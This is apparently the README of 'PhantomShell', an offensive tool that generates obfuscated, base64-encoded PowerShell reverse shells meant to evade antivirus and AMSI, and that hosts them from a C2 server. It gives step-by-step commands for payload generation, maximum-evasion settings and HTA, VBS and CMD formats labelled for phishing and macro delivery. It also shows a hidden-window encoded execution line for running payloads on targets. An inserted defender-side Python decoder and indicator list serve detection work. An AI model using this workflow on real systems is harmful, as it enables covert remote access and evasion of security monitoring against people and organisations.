👻 PhantomShell

Advanced PowerShell AV / AMSI Evasion Framework + Enterprise C2 Server

Red-team framework designed for authorized penetration testing and adversary simulation.

PhantomShell combines an advanced PowerShell payload generator with a lightweight Command & Control (C2) infrastructure, enabling red-team operators to generate payloads, host them, and manage reverse shell sessions.


👻 What is PhantomShell?

PhantomShell generates obfuscated, base64-encoded PowerShell reverse shells designed to evade signature-based antivirus detection and AMSI scanning.

It automates tasks such as:

  • variable obfuscation
  • payload encoding
  • multi-layer execution wrapping
  • hiding IP and port values
  • HTTP payload delivery
  • polymorphic payload generation

All from one command-line tool.


๐Ÿ” Is PhantomShell Undetectable?

No tool can guarantee that.

PhantomShell helps evade signature-based detection, but it cannot bypass every defensive mechanism.

| Technique | What it helps evade | What it cannot evade |
|---|---|---|
| Variable renaming | static signatures | behavioral detection |
| Base64 encoding | plain-text scanning | runtime AMSI |
| Multi-layer wrapping | shallow analysis | deep sandboxing |
| IP hiding | simple pattern matching | network monitoring |
| Polymorphism | hash detection | AI behavioral EDR |

Best evasion profile:

--obf-profile random
--layers 3
--enc-b64

🚀 Features

⚡ Payload Generation

  • multi-layer PowerShell encoding
  • AMSI-aware payload structure
  • polymorphic payload generation
  • randomized variable names
  • multiple delivery formats

🎮 Command & Control

  • lightweight Python C2 server
  • CLI operator shell
  • web dashboard
  • multi-session handling
  • remote command execution

🎯 Red Team Usage

  • reverse shell generation
  • HTTP payload hosting
  • polymorphic payload variants
  • session monitoring

๐Ÿ— Architecture

Target Machine
      │
      │ Reverse Shell
      ▼
PhantomShell C2 Server
      │
      ├── CLI Interface
      │
      └── Web Dashboard

⚙ Installation

No external dependencies.

git clone https://github.com/adrilaw/PhantomShell.git

cd PhantomShell

chmod +x phantomshell.py

chmod +x phantomc2.py

python3 phantomc2.py --help

python3 phantomshell.py --help

🚀 Quick Start

Terminal 1 — Start C2 server

python3 phantomc2.py --port 4444 --web-port 8080 --password RedTeam2026

For more information on the Phantom C2 server, use the command below:

python3 phantomc2.py --port 4444 --help

Terminal 2 — Generate payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Run the generated command on the Windows target.

Shell connects back to Terminal 1.


💾 Payload Generating Command Reference

Terminal 2 — Generate Payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Copy the output and run it on the target Windows machine.


📖 Command Reference

revshell — Standalone Payload

python3 phantomshell.py revshell -i <IP> -p <PORT> [OPTIONS]

| Flag | Short | Description | Default |
|---|---|---|---|
| --attacker-ip | -i | attacker IP | required |
| --port | -p | listening port | required |
| --obf-profile | -o | minimal/aggressive/random | aggressive |
| --layers | -l | encoding layers | 1 |
| --format | -f | payload format | powershell |
| --enc-b64 | | hide IP and port | off |
| --keep-pwd | | show CWD | off |
| --do-not-hide | | disable hidden flags | off |
| --verbose | -v | verbose output | off |

Examples

Basic payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444

Maximum evasion

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -o random -l 3 --enc-b64

HTA payload

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f hta -l 2

CMD wrapper

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -f cmd

Verbose mode

python3 phantomshell.py revshell -i 10.10.10.5 -p 4444 -v

๐ŸŒ server โ€” HTTP Payload Hosting

Starts an HTTP server and prints a download cradle.

python3 phantomshell.py server -i <IP> -p <PORT>

| Flag | Description | Default |
|---|---|---|
| -i | attacker IP | required |
| -p | reverse shell port | required |
| --server-port | HTTP port | 8000 |
| -o | payload filename | random |
| --layers | encoding layers | 1 |
| --enc-b64 | hide IP/port | off |

Example:

python3 phantomshell.py server -i 10.10.10.5 -p 4444

Target execution:

powershell -NoP -sta -NonI -W Hidden -enc <CRADLE>

🔄 polymorph — Polymorphic Payload Generator

Generate multiple unique payload variants.

python3 phantomshell.py polymorph -i <IP> -p <PORT>

Example:

python3 phantomshell.py polymorph -i 10.10.10.5 -p 4444 -n 5

Output example

Variant 1 profile=minimal FP:B0CCA4CD
Variant 2 profile=aggressive FP:06F530B1
Variant 3 profile=random FP:A273D56F

🎯 Obfuscation Profiles

minimal

$client → $c
$stream → $st
$bytes → $b

Fast and readable.


aggressive

$client → $xA1
$stream → $xB2
$bytes → $xC3

Default profile.


random

$client → $mKpRx
$stream → $zQ6v8A6
$bytes → $hySOJ

Different every run.


🧅 Encoding Layers

| Layer | Description |
|---|---|
| 1 | utf-16le base64 |
| 2 | base64 wrapped in IEX |
| 3 | multi-stage base64 decoding |

Payload is verified before output.


📦 Output Formats

| Format | Usage |
|---|---|
| powershell | direct execution |
| cmd | cmd injection |
| hta | phishing |
| vbs | macro delivery |
| mshta | one-liner execution |

🎯 Example Attack Workflow

# Listener
python3 phantomc2.py --port 4444 --web-port 8080 --password RedTeam2026

# Generate payload
python3 phantomshell.py server -i 10.10.10.5 -p 4444 -l 2

# Execute on target
powershell -NoP -sta -NonI -W Hidden -enc <payload>
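As an added defender-side example (not part of the PhantomShell project), the Python below shows how a blue team unwinds the encoding layers described in the Encoding Layers section when a command line of the shape shown above (`-W Hidden -enc <base64>`) turns up in process-creation logs: layer 1 is the UTF-16LE base64 carried by `-enc`, layer 2 is a `FromBase64String('...')` literal inside `IEX`, and the indicators reported are the hidden-window flags and the decoding primitives themselves. The sample command line, its harmless inner script and the indicator list are all constructed here for the demonstration.

```python
import base64
import re

# Constructed sample (not a real payload): a command line of the shape the
# README shows, wrapping a harmless inner script in the "layer 2" form
# (a base64 string handed to FromBase64String inside IEX).
INNER_SCRIPT = "Write-Output 'constructed sample'"
LAYER2 = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(INNER_SCRIPT.encode("utf-8")).decode() + "')))")
LAYER1 = base64.b64encode(LAYER2.encode("utf-16le")).decode()  # what -enc carries
SAMPLE_CMDLINE = "powershell -NoP -sta -NonI -W Hidden -enc " + LAYER1

# -EncodedCommand and its common abbreviations (-e, -ec, -enc).
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# The inner "layer 2" pattern: FromBase64String('<base64>')
INNER_B64 = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
# Strings worth surfacing in an alert (assumed list; extend from your own telemetry).
INDICATORS = ["-W Hidden", "-NonI", "-NoP", "IEX", "Invoke-Expression", "FromBase64String"]


def decode_layers(cmdline, max_depth=5):
    """Return every decoded stage, outermost first.

    Layer 1 is the -enc argument (UTF-16LE text, base64); each further layer
    is a FromBase64String('...') literal (UTF-8 text) found in the previous stage.
    """
    stages = []
    m = ENC_FLAG.search(cmdline)
    if not m:
        return stages
    try:
        stages.append(base64.b64decode(m.group(1)).decode("utf-16le"))
    except (ValueError, UnicodeDecodeError):
        return stages  # not a well-formed -enc argument
    for _ in range(max_depth):
        n = INNER_B64.search(stages[-1])
        if not n:
            break
        try:
            stages.append(base64.b64decode(n.group(1)).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            break
    return stages


def triage(cmdline):
    """Summarise one process-creation command line for an analyst."""
    stages = decode_layers(cmdline)
    # Match indicators on visible text only (base64 blobs replaced), so a random
    # "iex" inside an encoded blob does not count as a hit.
    visible = [ENC_FLAG.sub("-enc <b64>", cmdline)]
    visible += [INNER_B64.sub("FromBase64String('<b64>')", s) for s in stages]
    haystack = "\n".join(visible).lower()
    found = [i for i in INDICATORS if i.lower() in haystack]
    return {"layers": len(stages), "indicators": found,
            "final_script": stages[-1] if stages else None}
```

Feed `triage()` the command-line field of each PowerShell process-creation event; a non-zero layer count together with hidden-window flags is the combination worth alerting on.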

🛡 Security Considerations

Use only in authorized environments.

Recommended:

  • firewall restrictions
  • HTTPS proxy
  • strong authentication
  • infrastructure rotation
  • log monitoring

⚠ Legal Disclaimer

This software is intended only for authorized cybersecurity testing.

Unauthorized use may violate computer crime laws.

The author assumes no liability for misuse.


๐Ÿ“ License

PhantomShell is licensed under the GNU General Public License and the PhantomShell Commercial License; see the LICENSE file for details.

๐Ÿ‘จโ€๐Ÿ’ป Author

Dodin Mel Adrien Lawrence Enzo

Offensive Security | Red Teaming

LinkedIn
https://www.linkedin.com/in/dodin-mel-adrien-lawrence-enzo-5568b91b5/

Twitter
https://twitter.com/AdrienDodin


โญ If this project helped you, consider starring the repository.
